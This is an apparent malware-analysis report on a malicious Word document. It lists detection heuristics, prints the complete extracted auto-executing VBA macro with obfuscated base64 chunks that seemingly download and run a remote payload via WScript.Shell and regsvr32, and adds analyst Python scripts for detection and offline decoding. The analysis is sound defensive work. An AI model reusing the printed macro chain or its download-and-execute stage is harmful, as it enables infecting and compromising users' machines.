Verdict: MALICIOUS
Risk score: 170

Heuristics (6)

- VBA project inside OOXML (medium, OOXML_VBA; 4 related findings): the document contains a VBA project, so VBA macros are present.
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT). Matched line in script: `Set globalRepo = CreateObject("wscript.shell")`
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: `Set globalRepo = CreateObject("wscript.shell")`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Sub autoopen()`
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All 16 URLs below were found in document text (OOXML body / shared strings). They are the XML namespace identifiers that Word declares in every document part, not endpoints the macro contacts; the encoded intel() chunks in the macro were not decoded by this pass, so any URL inside them is not listed.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
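The co-occurrence rule OLE_VBA_PCODE_AUTOEXEC_EXEC, re-implemented as an added example. This is not the analyzer's code: the token lists are copied from the rule description above, the four input streams are constructed here (the first mirrors the two lines the report matched), and scanning both ASCII and UTF-16LE is this example's own assumption about how identifiers may be stored in compiled VBA streams.

```python
"""Added example (not the analyzer's own code): a re-implementation of the
OLE_VBA_PCODE_AUTOEXEC_EXEC co-occurrence rule. It fires only when an
auto-exec entry point AND an execution token are both present in the same
byte stream, which is what lets it catch documents whose VBA source was
stripped (p-code only) or failed to decompress."""

AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def find_tokens(stream: bytes, tokens) -> list:
    """Case-insensitive substring search for each token, in both ASCII and
    UTF-16LE. Assumption made here: identifier tables in compiled/cache
    streams of a VBA project may be stored in either encoding, so a raw
    scan tries both (bytes.lower() folds ASCII only, which is all we need)."""
    low = stream.lower()
    hits = []
    for tok in tokens:
        t = tok.lower()
        if t.encode("ascii") in low or t.encode("utf-16-le") in low:
            hits.append(tok)
    return sorted(hits)


def pcode_autoexec_exec(stream: bytes):
    """Return (fires, autoexec_hits, exec_hits). Neither list alone fires the
    rule; only the pairing does."""
    auto = find_tokens(stream, AUTOEXEC_TOKENS)
    exe = find_tokens(stream, EXEC_TOKENS)
    return (bool(auto) and bool(exe), auto, exe)


def scan_vba_project(path: str) -> dict:
    """Run the rule over every raw stream of an OLE container such as the
    carved vbaProject_00.bin, without decompressing anything: the p-code
    (performance cache) part of a module stream is stored uncompressed, so a
    raw scan still sees identifiers after the compressed source has been
    removed. Needs the third-party `olefile` package."""
    import olefile
    results = {}
    with olefile.OleFileIO(path) as ole:
        for entry in ole.listdir(streams=True, storages=False):
            fires, auto, exe = pcode_autoexec_exec(ole.openstream(entry).read())
            if fires:
                results["/".join(entry)] = (auto, exe)
    return results


# Constructed inputs (not carved from the sample). The first mirrors the two
# lines the report matched; the next two are single-token controls that must
# not fire; the last stores both identifiers as UTF-16LE.
SAMPLE_BOTH = (b'Sub autoopen()\r\ntextboxSwapLen\r\nEnd Sub\r\n'
               b'Set globalRepo = CreateObject("wscript.shell")\r\n')
SAMPLE_AUTOEXEC_ONLY = b'Sub AutoOpen()\r\nMsgBox "hello"\r\nEnd Sub\r\n'
SAMPLE_EXEC_ONLY = b'Sub Button1_Click()\r\nShell "calc.exe", vbHide\r\nEnd Sub\r\n'
SAMPLE_UTF16 = ("Document_Open".encode("utf-16-le") + b"\x00\x00"
                + "URLDownloadToFile".encode("utf-16-le"))

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:  # e.g. python rule.py vbaProject_00.bin
        print(scan_vba_project(sys.argv[1]))
    for name in ("SAMPLE_BOTH", "SAMPLE_AUTOEXEC_ONLY", "SAMPLE_EXEC_ONLY", "SAMPLE_UTF16"):
        print(name, pcode_autoexec_exec(globals()[name]))
```

On the sample above the rule pairs `autoopen` with both `CreateObject` and the `Shell` substring of `wscript.shell`; the two control streams each carry one side of the pair and stay silent, which is the behaviour the rule description promises.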
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9646 bytes | fe3b432381a9135d5df3edbb74fe99765846951d69f3ec26bdb1fb8c5a593113 |

Preview script (first 1,000 lines of the extracted macros.bas):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "frm"
Attribute VB_Base = "0{835C303E-17BF-4C7D-8C15-7323291A0465}{7938C441-8896-44E7-ACF5-4388846EE7E5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function titleLib()
With frm.button1
titleLib = .Tag
End With
End Function
Function valueExRequest()
With frm.button1
valueExRequest = .Caption
End With
End Function
Public Sub button1_Click()
Set globalRepo = CreateObject("wscript.shell")
globalRepo.exec p(titleLib) & " " & p(valueExRequest)
End Sub
Attribute VB_Name = "requestProcTextbox"
Sub autoopen()
textboxSwapLen
End Sub
Function intel(memoryTableStorage)
intel = "" & memoryTableStorage & ""
End Function
Sub textboxSwapLen()
Dim variableBuf As String
variableBuf = p(frm.button1.Caption)
Set tableExLeft = New rightRemove
tableExLeft.counterSizeNext variableBuf, structRef
frm.button1_Click
End Sub
Function indexTextboxClass(titleExceptionCounter, procIndex, loadStorageButton)
indexTextboxClass = Replace(titleExceptionCounter, procIndex, loadStorageButton)
End Function
Attribute VB_Name = "pasteExceptionDocument"
Function genericEx()
genericEx = intel("<html><body><div id='content'>fTtlc29sYy55cmV1UW1lbTspMiAsImdwai")
End Function
Function optionFuncCaption()
optionFuncCaption = intel("5jaXJlbmVHbm9pdHBvXFxjaWxidXBcXHNyZXN1XFw6YyIoZWxpZm90ZXZhcy55cm")
End Function
Function optionEx()
optionEx = intel("V1UW1lbTspeWRvYmVzbm9wc2VyLnRoZ2lSdHhlVHJldG51b2MoZXRpcncueXJldV")
End Function
Function indexVar()
indexVar = intel("FtZW07MSA9IGVweXQueXJldVFtZW07bmVwby55cmV1UW1lbTspIm1hZXJ0cy5iZG")
End Function
Function buttonRef()
buttonRef = intel("9kYSIodGNlamJPWGV2aXRjQSB3ZW4gPSB5cmV1UW1lbSByYXZ7KTAwMiA9PSBzdX")
End Function
Function captionBufferTmp()
captionBufferTmp = intel("RhdHMudGhnaVJ0eGVUcmV0bnVvYyhmaTspKGRuZXMudGhnaVJ0eGVUcmV0bnVvYz")
End Function
Function querySize()
querySize = intel("spZXNsYWYgLCJqSUxkS3ZHc2IxanNSRj1sQmwmRnM0V1BXS3NuYWd2NjM5SWgwcW")
End Function
Function clearText()
clearText = intel("dIV0VPQ2c9aGNyYWVzJlJ4WkQ5THJNMzJ2eldwbE1McEJIVDNzNWZUeGZlPWRpJk")
End Function
Function databaseVar()
databaseVar = intel("tKenRkampDeGNWRDZxeWtRPWZlciY5eD1lZ2FwJlpFS0FUVlYxT3djRkt5anBmST")
End Function
Function listWindow()
listWindow = intel("1lbWl0JjlLaXh2PXJlc3UmWHVZWTg3ako9cmVzdT80bmF4LzIyNTQ4L3QzYlREOV")
End Function
Function storageView()
storageView = intel("RveTY3Mzhxd2FNOWd2LzY0MTk5LzAxNTA0L1J3SHp4Z0ZlYmxmV3E0UUxzZWxiVT")
End Function
Function removeSize()
removeSize = intel("RhaFdwYy92UzJUODVnQ0JmaHlHZkNsRHZoYWhWUEZSVWcwYW45UHZKdWlDUlE0L2")
End Function
Function loadArgument()
loadArgument = intel("RpU0I5RTV4R2cvMDgyMzMvdjI4ck9WQ09uV1A0WjAvVnYxcVhsempvWFhKWmRJaz")
End Function
Function convertPointerEx()
convertPointerEx = intel("J5U2ZrUllhOHkyZWR3L3N5dW9nL21vYy44MDAyLXRuZW1lZ2FuYW0tZWNhZnJ1cy")
End Function
Function libResponseWindow()
libResponseWindow = intel("8vOnB0dGgiICwiVEVHIihuZXBvLnRoZ2lSdHhlVHJldG51b2M7KSJwdHRobG14Lj")
End Function
Function constWindowVariable()
constWindowVariable = intel("JsbXhzbSIodGNlamJPWGV2aXRjQSB3ZW4gPSB0aGdpUnR4ZVRyZXRudW9jIHJhdg")
End Function
Function exceptionVariable()
exceptionVariable = intel("==|fXspdGZlTHJldG51b0Nub2l0cGVjeGUoaGN0YWN9OykiYXRoLmNpcmVuZUdub")
End Function
Function databaseTrust()
databaseTrust = intel("2l0cG9cXGNpbGJ1cFxcc3Jlc3VcXDpjIihlbGlmZXRlbGVkLnlyb21lTXJvdGFyZ")
End Function
Function classData()
classData = intel("XRJZXRlbGVke3lydDspInRjZWpib21ldHN5c2VsaWYuZ25pdHBpcmNzIih0Y2VqY")
End Function
Function pointerReferenceView()
pointerReferenceView = intel("k9YZXZpdGNBIHdlbiA9IHlyb21lTXJvdGFyZXRJZXRlbGVkIHJhdjspImdwai5ja")
End Function
Function funcRepoArray()
funcRepoArray = intel("XJlbmVHbm9pdHBvXFxjaWxidXBcXHNyZXN1XFw6YyAyM3J2c2dlciIobnVyLikib")
End Function
Function countLeft()
countLeft = intel("GxlaHMudHBpcmNzdyIodGNlamJPWGV2aXRjQSB3ZW4=</div><div id='table1")
End Function
Function namespaceLib()
namespaceLib = intel("'>ABCDEFGHIJKLMNOPQRSTUVWXYZ</div><div id='table2'>0123456789+/<")
End Function
Function procedureProc()
procedureProc = intel("/div><div id='table3'></div><script language='javascript'>functi")
End Function
Function globalScreen()
globalScreen = intel("on classAOption(tableDocumentRight){return(new ActiveXObject(tab")
End Function
Function procedureRemove()
procedureRemove = intel("leDocumentRight));}function referenceTemp(valueBorder){return(ge")
End Function
Function textboxExceptionScreen()
textboxExceptionScreen = intel("nericIndex.getElementById(valueBorder).innerHTML);}function view")
End Function
Function procClear()
procClear = intel("Iterator(){var exceptionLibView = referenceTemp('table1');var bu")
End Function
Function bufCounterRequest()
bufCounterRequest = intel("fferMemoryPtr = exceptionLibView.toLowerCase();var tableMemoryIt")
End Function
Function WQuery()
WQuery = intel("erator = referenceTemp('table2');return(exceptionLibView + buffe")
End Function
Function countLocalMemory()
countLocalMemory = intel("rMemoryPtr + tableMemoryIterator);}function removeLoadIndex(s){v")
End Function
Function valueNamespace()
valueNamespace = intel("ar e={}; var i; var b=0; var c; var x; var l=0; var a; var listT")
End Function
Function varCaption()
varCaption = intel("able=''; var w=String.fromCharCode; var L=s.length;var counterLi")
End Function
Function captionNextA()
captionNextA = intel("stProcedure = 'charAt';for(i=0;i<64;i++){e[viewIterator()[counte")
End Function
Function copyList()
copyList = intel("rListProcedure](i)]=i;}for(x=0;x<L;x++){c=e[s[counterListProcedu")
End Function
Function removePtr()
removePtr = intel("re](x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(")
End Function
Function listboxNextText()
listboxNextText = intel("L-2)))&&(listTable+=w(a));}}return(listTable);};function ARefStr")
End Function
Function procRepoRemove()
procRepoRemove = intel("uct(variableTextDatabase){return variableTextDatabase.split('').")
End Function
Function memoryBuf()
memoryBuf = intel("reverse().join('');}valueStruct = window;genericIndex = document")
End Function
Function namespaceCaption()
namespaceCaption = intel(";valueStruct.resizeTo(1, 1);valueStruct.moveTo(-100, -100);var r")
End Function
Function documentArray()
documentArray = intel("epoEx = genericIndex.getElementById('content').innerHTML;var rep")
End Function
Function constSize()
constSize = intel("oEx = repoEx.split('|');var pasteBuffer = ARefStruct(removeLoadI")
End Function
Function convertValue()
convertValue = intel("ndex(repoEx[0]));var selectVariable = ARefStruct(removeLoadIndex")
End Function
Function databaseW()
databaseW = intel("(repoEx[1]));</script><script language='javascript'>function val")
End Function
Function storageExClear()
storageExClear = intel("ueDatabase(referenceButtonPointer){var ExStorageW = classAOption")
End Function
Function textboxSwap()
textboxSwap = intel("('msscriptcontrol.scriptcontrol');ExStorageW.Language = 'jscript")
End Function
Function refLibValue()
refLibValue = intel("';ExStorageW.Timeout = 60000;ExStorageW.AddCode(referenceButtonP")
End Function
Function tableCollectionWindow()
tableCollectionWindow = intel("ointer);return(null);}</script><script language='vbscript'>value")
End Function
Function swapCopySwap()
swapCopySwap = intel("Database pasteBuffer : valueDatabase selectVariable : valueStruc")
End Function
Function argumentTableIndex()
argumentTableIndex = intel("t.close</script></body></html>")
End Function
Function structRef()
structRef = genericEx + optionFuncCaption + optionEx + indexVar + buttonRef + captionBufferTmp + querySize + clearText + databaseVar + listWindow + storageView + removeSize + loadArgument + convertPointerEx + libResponseWindow + constWindowVariable + exceptionVariable + databaseTrust + classData + pointerReferenceView + funcRepoArray + countLeft + namespaceLib + procedureProc + globalScreen + procedureRemove + textboxExceptionScreen + procClear + bufCounterRequest + WQuery + countLocalMemory + valueNamespace + varCaption + captionNextA + copyList + removePtr + listboxNextText + procRepoRemove + memoryBuf + namespaceCaption + documentArray + constSize + convertValue + databaseW + storageExClear + textboxSwap + refLibValue + tableCollectionWindow + swapCopySwap + argumentTableIndex
End Function
Attribute VB_Name = "rightRemove"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Sub counterSizeNext(memLocal As String, WProcedure As String)
Dim procTextbox As FileSystemObject
Set procTextbox = New FileSystemObject
Dim textGlobal As TextStream
Set textGlobal = procTextbox.CreateTextFile(memLocal)
textGlobal.WriteLine WProcedure
textGlobal.Close
Set textGlobal = Nothing
Set procTextbox = Nothing
End Sub
Attribute VB_Name = "libSize"
Function p(convertProcRequest)
p = indexTextboxClass(convertProcRequest, "@", "")
End Function

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 41472 bytes | 19aeb645ef3f39a4731caf5bfe16d10137ae94d85d4725df2cdc4b8eb57afa8b |
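The preview shows the whole unpacking chain: `autoopen` calls `textboxSwapLen`, which joins the `intel("...")` literals in the order `structRef` lists them, writes the result with `counterSizeNext` (a FileSystemObject text file) to the path held in `frm.button1.Caption`, and then `button1_Click` runs `p(.Tag) & " " & p(.Caption)` through `WScript.Shell.Exec`, where `p` (module libSize) strips every `@`. Two things a reader of the preview should not expect to find in it: the file path and the program that launches it are the button's Caption and Tag, which sit in the UserForm's storage inside vbaProject.bin rather than in module source (olevba extracts form strings separately), and the real payload is not the HTML skeleton but what its inline script decodes. That script is plaintext in the tail chunks: `removeLoadIndex` is a standard-alphabet base64 decoder, `ARefStruct` reverses a string, the `content` div is split on `|`, and each piece is fed to `MSScriptControl.ScriptControl.AddCode` with Language `jscript` before the window closes. The following added script (not the analyzer's or the macro author's code) reproduces that decoding offline on a constructed stand-in with the same layout; function and stage names in the stand-in are invented, and pointing the script at the carved macros.bas prints the sample's own stages.

```python
"""Added example (not the analyzer's or the macro author's code): unpack the
dropped HTML the way the macro and its embedded script do, on a constructed
stand-in of macros.bas. structRef() order decides the byte order, then the
dropped page's JS takes div#content, splits on '|', base64-decodes each part
and reverses it. Usage: python unpack.py macros.bas (no argument: stand-in)."""
import base64
import re
import sys

CHUNK_RE = re.compile(r'Function\s+(\w+)\(\)\s*\1\s*=\s*intel\("([^"]*)"\)')


def chunk_order(vba_src: str) -> list:
    """Names in the order `structRef = a + b + ...` adds them; that line, not
    the order the functions are defined in, decides the byte order."""
    m = re.search(r"structRef\s*=\s*(.+)", vba_src)
    return [n.strip() for n in m.group(1).split("+")]


def chunk_values(vba_src: str) -> dict:
    """Every `Function X()` whose body is `X = intel("...")`, keyed by name."""
    return dict(CHUNK_RE.findall(vba_src))


def rebuild_payload(vba_src: str) -> str:
    """What counterSizeNext writes to disk: the chunks joined in structRef order."""
    values = chunk_values(vba_src)
    return "".join(values[name] for name in chunk_order(vba_src))


def decode_content(html: str) -> list:
    """Mirror removeLoadIndex (standard-alphabet base64) and ARefStruct
    (string reverse) from the dropped page's script. Bytes are mapped with
    latin-1 because the JS builds its string with String.fromCharCode(byte)."""
    m = re.search(r"<div id='content'>(.*?)</div>", html, re.S)
    stages = []
    for part in m.group(1).split("|"):
        raw = base64.b64decode(part + "=" * (-len(part) % 4))
        stages.append(raw.decode("latin-1")[::-1])
    return stages


def unpack(vba_src: str) -> list:
    """Decoded stages, in the order the dropped page would AddCode them."""
    return decode_content(rebuild_payload(vba_src))


def make_sample(stages: list) -> str:
    """Constructed stand-in for macros.bas with the same shape as the preview:
    base64(reversed stage) parts joined by '|', wrapped in the HTML skeleton,
    cut into 64-char intel() literals. Definitions are emitted in reverse so
    the example proves the order comes from structRef, not from the source."""
    content = "|".join(base64.b64encode(s[::-1].encode("latin-1")).decode()
                       for s in stages)
    html = "<html><body><div id='content'>" + content + "</div></body></html>"
    pieces = [html[i:i + 64] for i in range(0, len(html), 64)]
    names = [f"chunk{i}" for i in range(len(pieces))]
    funcs = [f'Function {n}()\n{n} = intel("{v}")\nEnd Function'
             for n, v in zip(names, pieces)]
    return ('Function intel(s)\nintel = "" & s & ""\nEnd Function\n'
            + "\n".join(reversed(funcs))
            + "\nFunction structRef()\nstructRef = " + " + ".join(names)
            + "\nEnd Function\n")


# Constructed stages (invented; not the sample's real payload).
SAMPLE_STAGES = ["function stage0(){return 1;}",
                 "var sh = new ActiveXObject('wscript.shell');"]

if __name__ == "__main__":
    if len(sys.argv) > 1:
        src = open(sys.argv[1], encoding="latin-1").read()
    else:
        src = make_sample(SAMPLE_STAGES)
    for i, stage in enumerate(unpack(src)):
        print(f"--- stage {i} ({len(stage)} chars) ---\n{stage}")
```

The regexes are deliberately narrow: only zero-argument functions whose body is a single `intel("...")` count as chunks, so `intel`, `p`, `titleLib` and `valueExRequest` are skipped, and the concatenation order is read from the `structRef` line instead of being assumed from definition order.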